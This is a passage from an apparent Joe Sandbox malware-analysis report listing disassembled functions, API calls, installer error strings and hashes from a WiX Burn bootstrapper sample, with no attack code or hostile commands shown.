                                                                                                                                                                                                                                                                                                  • Failed to open log., xrefs: 005C4B18
                                                                                                                                                                                                                                                                                                  • Failed to set layout directory variable to value provided from command-line., xrefs: 005C4C06
                                                                                                                                                                                                                                                                                                  • Failed to set registration variables., xrefs: 005C4BDE
                                                                                                                                                                                                                                                                                                  • WixBundleLayoutDirectory, xrefs: 005C4BF5
                                                                                                                                                                                                                                                                                                  • Failed to check global conditions, xrefs: 005C4B49
                                                                                                                                                                                                                                                                                                  • Failed to create the message window., xrefs: 005C4B98
                                                                                                                                                                                                                                                                                                  • Failed to set action variables., xrefs: 005C4BC4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: MessagePostWindow
                                                                                                                                                                                                                                                                                                  • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                                                                                                                                                                  • API String ID: 3618638489-3051724725
                                                                                                                                                                                                                                                                                                  • Opcode ID: 17fd02f613397e4e4916f91c426f549a892d834cf117365eba4ed739b0b05ebd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e4316e1bf7c6ebe43d5d375ccbcd651da4a18a0321ff8f40378df94107b5d9f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17fd02f613397e4e4916f91c426f549a892d834cf117365eba4ed739b0b05ebd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2541073164161BBFCB2A5AA4CC69FBBBE5DFF00754F01561AF800962A0E7A0EC109ED0
                                                                                                                                                                                                                                                                                                  Function 005DEA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,005C548E,?,?), ref: 005DEA9D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005C548E,?,?), ref: 005DEAAA
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 005DEB03
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005C548E,?,?), ref: 005DEB10
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,005C548E,?,?), ref: 005DEB4B
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,005C548E,?,?), ref: 005DEB6A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,005C548E,?,?), ref: 005DEB77
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2351989216-3599963359
                                                                                                                                                                                                                                                                                                  • Opcode ID: 502ff29e753541a9036c73bd49676872f5673a3c232d6d78d0d93c025d45b948
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4964a3630c8166c86f9707801db0017ea13705127865dfa0e64886e450f93ed4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 502ff29e753541a9036c73bd49676872f5673a3c232d6d78d0d93c025d45b948
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05317676D4121ABBD720EF9D8D86A9FBEA8FF04750F154167B905FB340E7309E0086A1
                                                                                                                                                                                                                                                                                                  Function 005E14E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,771B2F60,?,?,005C5405,005C53BD,00000000,005C5445), ref: 005E1506
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005E1519
                                                                                                                                                                                                                                                                                                  • GetExitCodeThread.KERNELBASE(0060B488,?), ref: 005E155B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005E1569
                                                                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(0060B460), ref: 005E15A4
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005E15AE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2979751695-3400260300
                                                                                                                                                                                                                                                                                                  • Opcode ID: d58e4a6ace5d7d8d75c00463472cef79fe1a9f9de07329946ee42b28774bc593
                                                                                                                                                                                                                                                                                                  • Instruction ID: ecdf3c89633e2a5ce08568b31b612bdbbdce5c21b7800e67b77216d7a0c448e6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d58e4a6ace5d7d8d75c00463472cef79fe1a9f9de07329946ee42b28774bc593
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D531D470A41646ABD7149FA68D05BBF7FF9FB44700B10846BF982DA160E730CA409F59
                                                                                                                                                                                                                                                                                                  Function 005C2DBF Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 203sleepfiletimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 005C2E5F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C2E69
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 005C2F09
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 005C2F96
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C2FA3
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 005C2FB7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 005C301F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 005C2F66
                                                                                                                                                                                                                                                                                                  • pathutil.cpp, xrefs: 005C2E8D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                                                                                                                                                                  • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3480017824-1101990113
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7342a1de704ef692dce16385a43ed36b666739446bfd830a4db5566c110a1e58
                                                                                                                                                                                                                                                                                                  • Instruction ID: dac57826232f53b20a103dda77ba603526b1f287425caab2118089277affa474
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7342a1de704ef692dce16385a43ed36b666739446bfd830a4db5566c110a1e58
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E71527294112DAFDB319F94DC4DFAABAB9BB08710F1041D9B905B7290D7749E80DFA0
                                                                                                                                                                                                                                                                                                  Function 005CCBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,005C53BD,00000000,005C5489,005C5445,WixBundleUILevel,840F01E8,?,00000001), ref: 005CCC1C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to find embedded payload: %ls, xrefs: 005CCC48
                                                                                                                                                                                                                                                                                                  • Payload was not found in container: %ls, xrefs: 005CCD29
                                                                                                                                                                                                                                                                                                  • Failed to ensure directory exists, xrefs: 005CCCEE
                                                                                                                                                                                                                                                                                                  • payload.cpp, xrefs: 005CCD1D
                                                                                                                                                                                                                                                                                                  • Failed to get directory portion of local file path, xrefs: 005CCCF5
                                                                                                                                                                                                                                                                                                  • Failed to get next stream., xrefs: 005CCD03
                                                                                                                                                                                                                                                                                                  • Failed to concat file paths., xrefs: 005CCCFC
                                                                                                                                                                                                                                                                                                  • Failed to extract file., xrefs: 005CCCE7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-1711239286
                                                                                                                                                                                                                                                                                                  • Opcode ID: f56aa491f138dbd567b212e014e55b070d45cbfe90c310c50cb04511ca8a0a47
                                                                                                                                                                                                                                                                                                  • Instruction ID: 153ebd59fdb62b077da5ce8dc00b49faec57e741c24d643b86bb1214ff822432
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f56aa491f138dbd567b212e014e55b070d45cbfe90c310c50cb04511ca8a0a47
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83419F31941219EFCF299FC4CC85FAEBF65BF40710B15816DE81AAB291D7709D40DB90
                                                                                                                                                                                                                                                                                                  Function 005C4796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 005C47BB
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 005C47C1
                                                                                                                                                                                                                                                                                                  • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005C484F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 005C489B
                                                                                                                                                                                                                                                                                                  • wininet.dll, xrefs: 005C47EE
                                                                                                                                                                                                                                                                                                  • Failed to start bootstrapper application., xrefs: 005C481D
                                                                                                                                                                                                                                                                                                  • Failed to create engine for UX., xrefs: 005C47DB
                                                                                                                                                                                                                                                                                                  • Unexpected return value from message pump., xrefs: 005C48A5
                                                                                                                                                                                                                                                                                                  • Failed to load UX., xrefs: 005C4804
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message$CurrentPeekThread
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 673430819-2573580774
                                                                                                                                                                                                                                                                                                  • Opcode ID: 40dbb956c1ee7d2f1a0e02ecb6054f4986136663113da8d5899559562cf23159
                                                                                                                                                                                                                                                                                                  • Instruction ID: 16d83b58aa38be1a84f742a949db0a1e3300d5fc3d58ad4349ddba73eafb8402
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40dbb956c1ee7d2f1a0e02ecb6054f4986136663113da8d5899559562cf23159
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6741C071A40156BFEB149BE4CC99FBBBBADFF04314F10452AF905E7280DB21AD418BA0
                                                                                                                                                                                                                                                                                                  Function 005CD6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,005C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,005C548E,?), ref: 005CD6DA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,005C548E,?,?), ref: 005CD6E7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 005CD71F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,005C548E,?,?), ref: 005CD72B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1866314245-2276003667
                                                                                                                                                                                                                                                                                                  • Opcode ID: b2a62accd9df5eaae3f61c834929e8f872caacf2a9832854eb0d2c2762f92445
                                                                                                                                                                                                                                                                                                  • Instruction ID: 80e204bc094533dbf1396a475ef770d08c628af1e6b41f7f465f54993169b30d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2a62accd9df5eaae3f61c834929e8f872caacf2a9832854eb0d2c2762f92445
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED118E37AC1B32ABDB3556D55C05F1B6AA5BB04B61F024539BE15EA6C0EB20D80086E4
                                                                                                                                                                                                                                                                                                  Function 005CF812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 005CF942
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 005CF94F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to read Resume value., xrefs: 005CF8D8
                                                                                                                                                                                                                                                                                                  • Failed to open registration key., xrefs: 005CF8AB
                                                                                                                                                                                                                                                                                                  • Resume, xrefs: 005CF8B6
                                                                                                                                                                                                                                                                                                  • Failed to format pending restart registry key to read., xrefs: 005CF846
                                                                                                                                                                                                                                                                                                  • %ls.RebootRequired, xrefs: 005CF82F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                  • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-3890505273
                                                                                                                                                                                                                                                                                                  • Opcode ID: db17521ec5c7db53481da604e5b8faa03acc6ee49db9d0b0a22fd8fbda6f1567
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3bdd361b42d771154f188c01c8266aa79f2dd9cadc1689fb8c234de5dfee3174
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db17521ec5c7db53481da604e5b8faa03acc6ee49db9d0b0a22fd8fbda6f1567
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F413771940119BFDF119FD8C881BADBFA6FB05710F16816AE911AB260C372AE419B80
                                                                                                                                                                                                                                                                                                  Function 6D370948 Relevance: 12.1, APIs: 8, Instructions: 136COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __RTC_Initialize.LIBCMT ref: 6D37098F
                                                                                                                                                                                                                                                                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 6D3709A9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1366715162.000000006D361000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D360000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366691686.000000006D360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366786381.000000006D39B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366806926.000000006D39D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6d360000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2442719207-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b80eadaa01676605fb0dfe6d6fcc9d8d1a1fb708ce61f8c3c9106332bd882302
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4a289d2f492ad6fca6aefce02a7a3e6c2337b7951a0e2934f546f293068042de
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b80eadaa01676605fb0dfe6d6fcc9d8d1a1fb708ce61f8c3c9106332bd882302
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F41D572D08A19EFDBB18F56CC41BBE3778EB81B58F028115E5546B250D77B8D01CBA8
                                                                                                                                                                                                                                                                                                  Function 00600523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0062B5FC,00000000,?,?,?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?), ref: 00600533
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,0062B5F4,?,005D4207,00000000,Setup), ref: 006005D7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?,?,?), ref: 006005E7
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?), ref: 00600621
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C2DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 005C2F09
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0062B5FC,?,?,0062B5F4,?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?), ref: 0060067A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4111229724-3545173039
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9dd6aff4d11d1524897f7752bfe475a6533cd950b714a962a4ba80709f32bc79
                                                                                                                                                                                                                                                                                                  • Instruction ID: 225834a8d46320d8f9eb2ac18516755b8d15039f76e3a9a1e14ebf79522de4ab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dd6aff4d11d1524897f7752bfe475a6533cd950b714a962a4ba80709f32bc79
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C31E631980A2AFFEB255FA09D45FAB7B6BFB40750F055124FD01AB2A0D772CD209B90
                                                                                                                                                                                                                                                                                                  Function 005E0B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Unexpected call to CabWrite()., xrefs: 005E0BC1
                                                                                                                                                                                                                                                                                                  • Failed to write during cabinet extraction., xrefs: 005E0C35
